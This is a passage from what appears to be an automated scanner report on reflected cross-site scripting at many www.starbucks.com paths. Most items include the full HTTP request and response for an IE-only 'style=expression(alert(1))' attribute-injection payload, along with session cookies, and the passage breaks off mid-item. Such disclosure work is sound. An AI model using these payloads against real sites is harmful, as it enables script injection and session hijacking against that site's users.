This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/learn-more/shared-values-blog?fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:17:46 GMT Connection: close Content-Length: 46392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/shared-values-blog?fa51c"style="x:expression(alert(1))"92ca21ea562=1"/> ...[SNIP]...
1.919. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21608"style="x:expression(alert(1))"cf8f3b757dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/learn-more/starbucks-shared-planet?21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:17:34 GMT Connection: close Content-Length: 37394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet?21608"style="x:expression(alert(1))"cf8f3b757dc=1"/> ...[SNIP]...
1.920. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab705"style="x:expression(alert(1))"0db2c74b13d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing?ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:01 GMT Connection: close Content-Length: 51277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing?ab705"style="x:expression(alert(1))"0db2c74b13d=1"/> ...[SNIP]...
1.921. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing/cocoa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 649df"style%3d"x%3aexpression(alert(1))"f64e12d5982 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 649df"style="x:expression(alert(1))"f64e12d5982 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing/cocoa?649df"style%3d"x%3aexpression(alert(1))"f64e12d5982=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:54 GMT Connection: close Content-Length: 38743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/cocoa?649df"style="x:expression(alert(1))"f64e12d5982=1"/> ...[SNIP]...
1.922. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4ba4"style="x:expression(alert(1))"aa5721e012a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing/coffee?c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:09 GMT Connection: close Content-Length: 40989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/coffee?c4ba4"style="x:expression(alert(1))"aa5721e012a=1"/> ...[SNIP]...
1.923. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing/farmer-support
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57860"style%3d"x%3aexpression(alert(1))"35fa26ea488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57860"style="x:expression(alert(1))"35fa26ea488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing/farmer-support?57860"style%3d"x%3aexpression(alert(1))"35fa26ea488=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:45 GMT Connection: close Content-Length: 39451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/farmer-support?57860"style="x:expression(alert(1))"35fa26ea488=1"/> ...[SNIP]...
1.924. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing/store-products
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c42"style%3d"x%3aexpression(alert(1))"3279581907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c42"style="x:expression(alert(1))"3279581907e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing/store-products?a4c42"style%3d"x%3aexpression(alert(1))"3279581907e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:32 GMT Connection: close Content-Length: 38439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/store-products?a4c42"style="x:expression(alert(1))"3279581907e=1"/> ...[SNIP]...
1.925. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/sourcing/tea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3bf3"style="x:expression(alert(1))"a81c545b7d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/sourcing/tea?d3bf3"style%3d"x%3aexpression(alert(1))"a81c545b7d9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:15:08 GMT Connection: close Content-Length: 37019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/tea?d3bf3"style="x:expression(alert(1))"a81c545b7d9=1"/> ...[SNIP]...
1.926. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/wellness
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7967c"style%3d"x%3aexpression(alert(1))"1b512706177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7967c"style="x:expression(alert(1))"1b512706177 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/wellness?7967c"style%3d"x%3aexpression(alert(1))"1b512706177=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:16:56 GMT Connection: close Content-Length: 41668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/wellness?7967c"style="x:expression(alert(1))"1b512706177=1"/> ...[SNIP]...
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 was submitted in the keywords parameter. This input was echoed as a5e7f"style="x:expression(alert(1))"ea56a668f54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?keywords=%27a5e7f"style%3d"x%3aexpression(alert(1))"ea56a668f54 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Referer: http://www.starbucks.com/smooth Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:03:39 GMT Content-Length: 34084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='a5e7f"style="x:expression(alert(1))"ea56a668f54"/> ...[SNIP]...
1.928. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe12b"style="x:expression(alert(1))"ef4935acaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?keywords=%27&fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Referer: http://www.starbucks.com/smooth Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:04:48 GMT Content-Length: 33998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='&fe12b"style="x:expression(alert(1))"ef4935acaa=1"/> ...[SNIP]...
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 was submitted in the keywords parameter. This input was echoed as 88b3a"style="x:expression(alert(1))"e0f4f9251b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /search/?keywords=88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:23:20 GMT Connection: close Content-Length: 34078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords=88b3a"style="x:expression(alert(1))"e0f4f9251b1"/> ...[SNIP]...
1.930. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ed55"style="x:expression(alert(1))"89be0e08a98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /search/?5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:27:44 GMT Connection: close Content-Length: 33719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?5ed55"style="x:expression(alert(1))"89be0e08a98=1"/> ...[SNIP]...
1.931. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/site-map
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b04"style="x:expression(alert(1))"eea619f23d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /site-map?66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:27:07 GMT Connection: close Content-Length: 92906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/site-map?66b04"style="x:expression(alert(1))"eea619f23d6=1"/> ...[SNIP]...
1.932. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/smooth
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62425"style%3d"x%3aexpression(alert(1))"fa95c58147d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62425"style="x:expression(alert(1))"fa95c58147d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /smooth?62425"style%3d"x%3aexpression(alert(1))"fa95c58147d=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/smooth?62425"style="x:expression(alert(1))"fa95c58147d=1"/> ...[SNIP]...
1.933. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/smooth/
Issue detail
